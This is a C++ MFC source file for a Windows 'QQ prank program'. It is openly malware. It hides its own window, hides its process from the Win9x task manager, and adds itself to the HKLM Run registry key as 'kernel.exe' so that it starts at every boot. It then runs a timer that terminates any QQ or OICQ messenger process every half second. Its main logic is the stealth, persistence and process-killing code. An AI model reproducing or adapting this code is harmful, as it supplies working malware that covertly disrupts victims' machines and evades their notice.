kerneldlg.cpp

QQ恶作程序

/******************************************************************/
/*Module:KernelDlg.cpp                                            */
/*Author:Inetufo                                                  */
/*Email:Inetufo@thugx.com                                         */
/*Date:2003/3/7                                                   */
/******************************************************************/
// KernelDlg.cpp : implementation file
//

#include "stdafx.h"
#include "Kernel.h"
#include "KernelDlg.h"
#include <atlbase.h>
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

class CAboutDlg : public CDialog
{
public:
	CAboutDlg();

// Dialog Data
	//{{AFX_DATA(CAboutDlg)
	enum { IDD = IDD_ABOUTBOX };
	//}}AFX_DATA

	// ClassWizard generated virtual function overrides
	//{{AFX_VIRTUAL(CAboutDlg)
	protected:
	virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
	//}}AFX_VIRTUAL

// Implementation
protected:
	//{{AFX_MSG(CAboutDlg)
	//}}AFX_MSG
	DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
	//{{AFX_DATA_INIT(CAboutDlg)
	//}}AFX_DATA_INIT
}

void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CAboutDlg)
	//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
	//{{AFX_MSG_MAP(CAboutDlg)
		// No message handlers
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CKernelDlg dialog

CKernelDlg::CKernelDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CKernelDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CKernelDlg)
		// NOTE: the ClassWizard will add member initialization here
	//}}AFX_DATA_INIT
	// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
	m_hIcon = AfxGetApp()->LoadIcon(IDI_ICONKERNEL);
}

void CKernelDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CKernelDlg)
		// NOTE: the ClassWizard will add DDX and DDV calls here
	//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CKernelDlg, CDialog)
	//{{AFX_MSG_MAP(CKernelDlg)
	ON_WM_SYSCOMMAND()
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	ON_WM_TIMER()
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CKernelDlg message handlers

BOOL CKernelDlg::OnInitDialog()
{
	CDialog::OnInitDialog();

	// Add "About..." menu item to system menu.

	// IDM_ABOUTBOX must be in the system command range.
	ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
	ASSERT(IDM_ABOUTBOX < 0xF000);

	CMenu* pSysMenu = GetSystemMenu(FALSE);
	if (pSysMenu != NULL)
	{
		CString strAboutMenu;
		strAboutMenu.LoadString(IDS_ABOUTBOX);
		if (!strAboutMenu.IsEmpty())
		{
			pSysMenu->AppendMenu(MF_SEPARATOR);
			pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
		}
	}

	// Set the icon for this dialog.  The framework does this automatically
	//  when the application's main window is not a dialog
	SetIcon(m_hIcon, TRUE);			// Set big icon
	SetIcon(m_hIcon, FALSE);		// Set small icon
	
	// TODO: Add extra initialization here
	HideWindow();                            //隐藏对话框窗口
	HideProcess();                           //Win9x下在任务管理器中隐藏进程
	Reg();                                   //改写注册表,开机自动运行
	SetTimer(1,500,NULL);                    //设定记时器,不断刷新进程数组,并寻找QQ进程将其结束
	return TRUE;  // return TRUE  unless you set the focus to a control
}

void CKernelDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
	if ((nID & 0xFFF0) == IDM_ABOUTBOX)
	{
		CAboutDlg dlgAbout;
		dlgAbout.DoModal();
	}
	else
	{
		CDialog::OnSysCommand(nID, lParam);
	}
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CKernelDlg::OnPaint() 
{
	if (IsIconic())
	{
		CPaintDC dc(this); // device context for painting

		SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

		// Center icon in client rectangle
		int cxIcon = GetSystemMetrics(SM_CXICON);
		int cyIcon = GetSystemMetrics(SM_CYICON);
		CRect rect;
		GetClientRect(&rect);
		int x = (rect.Width() - cxIcon + 1) / 2;
		int y = (rect.Height() - cyIcon + 1) / 2;

		// Draw the icon
		dc.DrawIcon(x, y, m_hIcon);
	}
	else
	{
		CDialog::OnPaint();
	}
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CKernelDlg::OnQueryDragIcon()
{
	return (HCURSOR) m_hIcon;
}

void CKernelDlg::HideProcess()
{
	   typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
       HINSTANCE hDLL;
       LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
       hDLL = LoadLibrary("KERNEL32");
	   lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
       lpRegisterServiceProcess(GetCurrentProcessId(),1);
	   FreeLibrary(hDLL);
}

void CKernelDlg::Reg()
{
     LPTSTR lpSysPath=new char[MAX_PATH];
	 ::GetSystemDirectory(lpSysPath,MAX_PATH);
	 LPCTSTR lpsysfilename;
	 lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,"\\kernel.exe");
	 DWORD dwValue;
     CRegKey Key;
     LPCTSTR lpszKeyname="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
     if(Key.Open(HKEY_LOCAL_MACHINE,lpszKeyname)==ERROR_SUCCESS)
         if( Key.QueryValue(dwValue,"Kernel")!=ERROR_SUCCESS)
              Key.SetValue(lpsysfilename,"Kernel");
     Key.Close();
}

void CKernelDlg::OnTimer(UINT nIDEvent) 
{
	m_PEArray.RemoveAll();
	HANDLE hProcessSnap=NULL;
	PROCESSENTRY32 pe32;
	hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    pe32.dwSize=sizeof(PROCESSENTRY32);
	if(::Process32First(hProcessSnap,&pe32))
	{
		do
		{	
			m_PEArray.Add(pe32);
		}
		while(::Process32Next(hProcessSnap,&pe32));

	}
	int i;
	for(i=0;i<m_PEArray.GetSize();i++)
	{
		CString str;
		str.Format("%s",m_PEArray[i].szExeFile);
        if(str.Find("QQ")!=-1||str.Find("OICQ")!=-1||str.Find("qq")!=-1||str.Find("oicq")!=-1)
		{
	     HANDLE hProcess;
	     DWORD ProcessID;
	     ProcessID=m_PEArray[i].th32ProcessID;
         hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID);
         ::TerminateProcess(hProcess,99);
		 CloseHandle(hProcess);
		}
	}

	CDialog::OnTimer(nIDEvent);
}

LRESULT CKernelDlg::WindowProc(UINT message, WPARAM wParam, LPARAM lParam) 
{
	// TODO: Add your specialized code here and/or call the base class
	//ShowWindow(SW_HIDE);
	
	return CDialog::WindowProc(message, wParam, lParam);
}
//隐藏对话框窗口的函数
void CKernelDlg::HideWindow()
{
	DWORD Style = ::GetWindowLong(AfxGetMainWnd()->m_hWnd,GWL_EXSTYLE);
    Style = WS_EX_TOOLWINDOW ;
	::SetWindowLong(AfxGetMainWnd()->m_hWnd,GWL_EXSTYLE,Style); 
	::MoveWindow(AfxGetMainWnd()->m_hWnd,0,0,0,0,FALSE);
}